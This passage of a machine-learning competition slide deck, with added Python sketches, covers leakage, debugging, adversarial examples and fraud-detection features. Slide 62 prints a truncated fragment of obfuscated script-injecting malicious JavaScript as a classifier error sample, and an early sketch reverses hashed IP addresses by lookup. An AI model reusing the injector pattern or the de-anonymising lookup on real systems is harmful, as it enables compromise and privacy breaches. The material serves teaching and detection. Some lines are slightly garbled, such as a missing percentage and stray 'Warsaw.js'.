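When the set of possible original values is small, reversing a hash needs no more than a precomputed lookup. The sketch below is a plain hash-to-value dictionary rather than a true rainbow table (which trades memory for time using hash chains); the /24 address range and the 8-character truncation are assumptions for illustration.

```python
import hashlib

def truncated_md5(value, length=8):
    """First `length` hex characters of the MD5 digest of a string."""
    return hashlib.md5(value.encode("utf-8")).hexdigest()[:length]

# Precompute hash -> original for every candidate value in a small domain.
# Here: a hypothetical private /24 network; real lookups need a larger domain.
candidates = [f"192.168.0.{host}" for host in range(256)]
lookup = {truncated_md5(ip): ip for ip in candidates}

obfuscated = truncated_md5("192.168.0.42")  # what the dataset would contain
recovered = lookup.get(obfuscated)
print(recovered)
```

Hashing low-entropy values such as IP addresses or ordinals hides very little, because the whole input space can be enumerated.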
  • 57. Breaking Stuff • Keep asking your curious self: What would happen if I changed this to that? Be Bold!
 • Local evaluation is your lifeline.
 • Try everything, keep the good.
 • Once I got an accuracy of 181% by submitting correct answers twice.
 [Figure labels: Statisticians, Machine Learners, Smart Machine Learner, CV] (The joke is that there are only smart statisticians)
 Intelligible Models for HealthCare: Predicting Pneumonia Risk and Hospital 30-day Readmission (Caruana, 2015)
  • 58. DataLeaks • A very common mistake. Can be deadly for business and science, so become good at finding leaks.
 • The task was to predict cancer. One of the variables was “underwent surgery for cancer, yes/no?”
 • You cannot use data that is not reasonably available at test time (or your lifeline evaluation cannot be trusted).
 Leakage in data mining: Formulation, detection, and avoidance (Kaufman et al., 2012)
  • 59. DataLeaks • Beware: The more powerful your model, the bigger the chance that it exploits any leakage you did not find.
 • The most powerful model is 1000 data scientists on a typewriter, which is why competitions see more leakage discovered.
 • A large sample of leakage may simply go undetected. Ben Hamner & Will Cukierski @ Kaggle
  • 60. DataLeaks • Winners of Microsoft malware binary classification 2015 were able to extract the desktop icon from the code. Visualize malware patterns - Microsoft Malware Classification Challenge BIG2015, (Chen, 2015)
  • 61. Sub-Linear Debugging • Output information while your computations are running, essential for iteration speed:
 • Can spot very fast if some change was good or bad.
 • Feels like Neo in the Matrix if you do this with the data itself during data reading.
 • Can spot data health issues (text encoding errors, all missing in the same row of data, etc.)
 Online Learning and Sub-Linear Debugging (Mineiro, 2014)
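One way to get feedback while the computation is still running is to print a running metric at exponentially growing example counts. This is a sketch under assumptions: the stream reuses the toy RoadSec rows, the model is a fixed hypothetical rule, and a true online learner would also update itself after each example.

```python
def progressive_accuracy(examples, predict):
    """Report running accuracy at example counts 1, 2, 4, 8, ... while streaming."""
    reports = []
    correct = 0
    next_report = 1
    for count, (features, label) in enumerate(examples, start=1):
        correct += int(predict(features) == label)
        if count == next_report:
            reports.append((count, correct / count))
            print(f"seen={count} running_accuracy={correct / count:.3f}")
            next_report *= 2
    return reports

# Hypothetical stream: the label equals the second feature except on one row.
stream = [((1, 1), 1), ((0, 1), 1), ((1, 1), 0), ((0, 1), 1),
          ((1, 0), 0), ((0, 0), 0), ((1, 0), 0), ((0, 0), 0)]
reports = progressive_accuracy(stream, predict=lambda features: features[1])
```

Doubling the reporting interval keeps the output short on large files while still showing within the first few rows whether something is badly wrong.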
  • 62. Error Debugging • See where your model makes the biggest mistakes. • Then try to fix it by creating new features • Below sample confidently predicted as minified JS when it was actually obfuscated malicious JS:
 
 
 
 
 
 4x66x32x37x62x33x31x38x30x38x31x34x37x63x32x34x30x62x35x65x31 x63x34x35x34x39x63x36x37x64x65x32","x67x65x74x45x6Cx65x6Dx65x6E x74x73x42x79x43x6Cx61x73x73x4Ex61x6Dx65","x72x65x6Dx6Fx76x65"," x67x65x74x45x6Cx65x6Dx65x6Ex74x42x79x49x64"];function injectarScript(_0x78afx2){return new Promise((_0x78afx3,_0x78afx4)=>{const _0x78afx5=document[_0xc7ae[1]](_0xc7ae[0]);_0x78afx5[_0xc7ae[2]]= true;_0x78afx5[_0xc7ae[3]]= _0x78afx2;document[_0xc7ae[5]][ Warsaw.js
  • 63. Error Debugging • How to fix? • Add the ratio of digits to characters • Add a human-readability score • Add the ratio of “x” characters to all characters
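The three features can be sketched in a few lines. The digit and “x” ratios follow the slide directly; the readability score is a crude stand-in invented for this example (share of characters inside alphabetic runs of three or more letters), so treat `wordlike_ratio` as a placeholder for whatever readability measure you prefer.

```python
import re


def obfuscation_features(source):
    """Character-level ratios that help separate minified from obfuscated JS."""
    n = len(source)
    if n == 0:
        return {"digit_ratio": 0.0, "x_ratio": 0.0, "wordlike_ratio": 0.0}
    digits = sum(ch.isdigit() for ch in source)
    xs = source.count("x")
    # Hypothetical readability proxy: characters that sit in runs of 3+ letters.
    wordlike = sum(len(run) for run in re.findall(r"[A-Za-z]{3,}", source))
    return {
        "digit_ratio": digits / n,
        "x_ratio": xs / n,
        "wordlike_ratio": wordlike / n,
    }


obfuscated = "x67x65x74x45x6Cx65x6Dx65x6E"   # fragment in the style of the sample
minified = "function add(a,b){return a+b}"  # made-up minified snippet

f_obf = obfuscation_features(obfuscated)
f_min = obfuscation_features(minified)
print(f_obf)
print(f_min)
```

After adding features like these, rerun the error analysis and check that the sample moves to the right side of the decision boundary.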
 
 
 
 
 
  • 64. Dumpster Diving • You should find out the sources and shapes of all your data, then do a deep dive:
 • Winners of the IJCNN 2011 Challenge wrote a Flickr crawler to de-anonymize users and obtain the ground truth.
 • Winners of the West Nile Virus Prediction Challenge found research papers which contained part of the ground truth.
 
 Link Prediction by De-anonymization: How We Won the Kaggle Social Network Challenge (2011, Narayanan et al.)
  • 65. Adversarial Input • These people are invisible to % of modern face detection CV Dazzle (Harvey et al., 2010)
  • 66. Adversarial Input • This image is confusing to modern object detection “A foreign attack helicopter firing missiles” Is attacking machine learning easier than defending it? (Goodfellow et al., 2017)
  • 67. Adversarial Input • Being able to fool neural networks, or to build strong defenses against adversarial images, is hugely valuable.
 • NIPS2018: Defense Against Adversarial Attack • Goodfellow et al.: CleverHans • Google: Unrestricted Adversarial Examples Challenge
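To get a feel for how such attacks work, here is a toy sketch of the fast gradient sign method (FGSM). The slides do not name this attack; it is swapped in here as one well-known example, and a hand-set logistic regression stands in for a neural network. The weights, input and epsilon are made up.

```python
import math


def predict(weights, bias, x):
    """Probability of class 1 under a logistic regression model."""
    z = bias + sum(w * xi for w, xi in zip(weights, x))
    return 1.0 / (1.0 + math.exp(-z))


def sign(value):
    return (value > 0) - (value < 0)


def fgsm(weights, bias, x, label, epsilon):
    """Move every input dimension by epsilon in the direction that increases the loss."""
    p = predict(weights, bias, x)
    # For log loss, d(loss)/d(x_i) = (p - label) * w_i.
    grad = [(p - label) * w for w in weights]
    return [xi + epsilon * sign(g) for xi, g in zip(x, grad)]


# Hypothetical model and input.
weights, bias = [2.0, -1.0, 0.5], 0.0
x, label = [0.3, -0.2, 0.1], 1

x_adv = fgsm(weights, bias, x, label, epsilon=0.5)
p_clean = predict(weights, bias, x)
p_adv = predict(weights, bias, x_adv)
print(p_clean, p_adv)
```

With images the same step is taken per pixel with a much smaller epsilon, which is why the change can be invisible to humans.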
  • 68. Adversarial Thinking • Pretend you are an identity fraudster: • Do you hack at night or during your day job/school? • Do you change details like email to match your victim’s name? • Are you more likely to use Windows or Linux? • Do you move location often, or use Tor to hide your location? • Do you try to get as much money as fast as possible, or are you more patient? • Do you memorize your victim’s personal details?
 

  • 69. Adversarial Thinking • Try to attack a system, then invent safeguards: • Encode the time of day of the attempt • Look at the string distance between legal name and email name • Deduce the operating system from the user agent string • Check if the IP was used for malicious behavior before • Check if the IP is a Tor IP • Check how long the user spends in the funnel, and their form behavior • Check if the user demands an unusually high limit • … Statistical Fraud Detection: A Review (Bolton et al., 2002)
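Several of these safeguards translate almost directly into features. The sketch below uses only the Python standard library; the field names of `application`, the IP sets and the operating-system matching are hypothetical and deliberately crude (for example, accented letters are dropped and iPhone user agents would be labeled as macOS).

```python
import re
from datetime import datetime
from difflib import SequenceMatcher


def letters_only(text):
    return re.sub(r"[^a-z]", "", text.lower())


def guess_os(user_agent):
    """Very rough OS guess; Android is checked before Linux because its UA contains both."""
    ua = user_agent.lower()
    for needle, name in (("windows", "windows"), ("android", "android"),
                         ("mac os", "macos"), ("linux", "linux")):
        if needle in ua:
            return name
    return "other"


def fraud_features(application, tor_exit_ips, known_bad_ips):
    email_name = application["email"].split("@", 1)[0]
    similarity = SequenceMatcher(
        None, letters_only(application["legal_name"]), letters_only(email_name)
    ).ratio()
    return {
        "hour_of_day": application["attempted_at"].hour,
        "name_email_similarity": similarity,
        "os": guess_os(application["user_agent"]),
        "ip_seen_in_abuse": application["ip"] in known_bad_ips,
        "ip_is_tor": application["ip"] in tor_exit_ips,
        "seconds_in_form": application["seconds_in_form"],
    }


# Made-up application; the IP comes from a documentation-only address range.
application = {
    "legal_name": "Maria Silva",
    "email": "maria.silva@example.com",
    "user_agent": "Mozilla/5.0 (X11; Linux x86_64)",
    "ip": "203.0.113.7",
    "attempted_at": datetime(2018, 5, 1, 3, 15),
    "seconds_in_form": 12,
}
features = fraud_features(application, tor_exit_ips={"203.0.113.7"}, known_bad_ips=set())
print(features)
```

None of these is a verdict on its own; they are inputs for a model or a review queue.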
  • 70. Botnet • Much of commercial ML can be, or already is being, automated. Much of advertisement fraud is automated already. • It is possible to get a good score in a competition completely automatically. • You can aggregate the results of many (automated) agents and get an even better result. • Think back to the ID fraudster example. Can you imagine how to cheat an ML competition? Could you encode ways to safeguard against this? Clickjacking campaign abuses Google Adsense, avoids ad fraud bots (Segura, 2017)
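Why aggregating agents helps can be shown with a toy simulation: ten hypothetical agents each predict the truth plus independent noise, and their plain average is compared with the individuals. The noise level and the number of agents are arbitrary choices, and real models are correlated, so gains in practice are smaller.

```python
import random


def mse(pred, truth):
    return sum((p - t) ** 2 for p, t in zip(pred, truth)) / len(truth)


rng = random.Random(42)
truth = [rng.random() for _ in range(200)]

# Each simulated agent is right on average but noisy in its own way.
agents = [[t + rng.gauss(0, 0.2) for t in truth] for _ in range(10)]

# Aggregate by averaging the agents' predictions row by row.
blend = [sum(column) / len(column) for column in zip(*agents)]

individual_errors = [mse(agent, truth) for agent in agents]
blend_error = mse(blend, truth)
print(min(individual_errors), blend_error)
```

For squared error the average of predictions can never be worse than the average agent, which is what makes blindly averaging automated submissions surprisingly effective.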
  • 71. Case Study: Higgs Boson • “Science cannot predict what will happen. It can only predict the probability of something happening.” - César Lattes
 • Use data from the ATLAS experiment to identify the Higgs boson (probability of it being signal or background noise)
 • No knowledge of particle physics is required.
 • XGBoost was a 0-day during the competition (This could’ve been you!) Higgs Boson Detection Challenge (2014, Kaggle & CERN)
  • 72. Case Study: Higgs Boson • Let’s hack together a solution: • Create random feature interactions and use Permutation Feature Importance to select the best ones • Add the best interactions to the data • Train 50 randomly initialized XGBoost models • Pick the model with the best log loss, lower its learning rate, and use early stopping to find the best number of trees. • Repeat the above 3 times and average the results Position: 30/1785
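The first two steps can be sketched without any dependencies. This is not the competition code: synthetic data replaces the ATLAS data, a small logistic regression stands in for XGBoost, and all pairwise products are tried instead of a random sample (on a wide dataset you would sample pairs). The point is only to show how permutation importance picks out a useful interaction.

```python
import math
import random
from itertools import combinations


def make_data(n, rng):
    """Synthetic stand-in data: the label depends only on the sign of x0 * x1."""
    X = [[rng.uniform(-1, 1) for _ in range(3)] for _ in range(n)]
    y = [1 if row[0] * row[1] > 0 else 0 for row in X]
    return X, y


def add_interactions(X, pairs):
    """Append one product feature per (i, j) pair to every row."""
    return [row + [row[i] * row[j] for i, j in pairs] for row in X]


def train_logistic(X, y, rng, epochs=30, lr=0.5):
    """Plain SGD logistic regression, used here as a stand-in model."""
    w, b = [0.0] * len(X[0]), 0.0
    order = list(range(len(X)))
    for _ in range(epochs):
        rng.shuffle(order)
        for k in order:
            z = b + sum(wi * xi for wi, xi in zip(w, X[k]))
            z = max(-30.0, min(30.0, z))  # keep exp() well-behaved
            g = 1.0 / (1.0 + math.exp(-z)) - y[k]
            w = [wi - lr * g * xi for wi, xi in zip(w, X[k])]
            b -= lr * g
    return w, b


def accuracy(model, X, y):
    w, b = model
    hits = 0
    for row, label in zip(X, y):
        z = b + sum(wi * xi for wi, xi in zip(w, row))
        hits += (z > 0) == (label == 1)
    return hits / len(y)


def permutation_importance(model, X, y, col, rng):
    """Drop in accuracy after shuffling one column on held-out data."""
    base = accuracy(model, X, y)
    column = [row[col] for row in X]
    rng.shuffle(column)
    X_perm = [row[:col] + [v] + row[col + 1:] for row, v in zip(X, column)]
    return base - accuracy(model, X_perm, y)


rng = random.Random(0)
pairs = list(combinations(range(3), 2))  # candidate interactions: (0,1), (0,2), (1,2)
X_train, y_train = make_data(400, rng)
X_valid, y_valid = make_data(400, rng)

model = train_logistic(add_interactions(X_train, pairs), y_train, rng)
X_valid_ext = add_interactions(X_valid, pairs)
scores = {
    pair: permutation_importance(model, X_valid_ext, y_valid, 3 + idx, rng)
    for idx, pair in enumerate(pairs)
}
best_pair = max(scores, key=scores.get)
print(scores, best_pair)
```

The remaining steps (many randomly seeded models, a lower learning rate with early stopping, and averaging three runs) are left out here because they depend on the boosting library you use.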
  • 73. Further Learning • MOOCs: Andrew Ng’s Machine Learning on Coursera, Competitive Data Science on Coursera, Abu-Mostafa’s Caltech Learning from Data • Platforms: Kaggle (Tutorials, Projects, Competitions, Forums, Kernels) • Programs: Fast.AI (Learn state-of-the-art deep learning) • Meetups: Sao Paulo Machine Learning Meetup • Books: Programming Collective Intelligence • Blogs: MLWave, FastML, MLWhiz, Machine Learning is Fun! • Professors: Find a cool professor and study their online output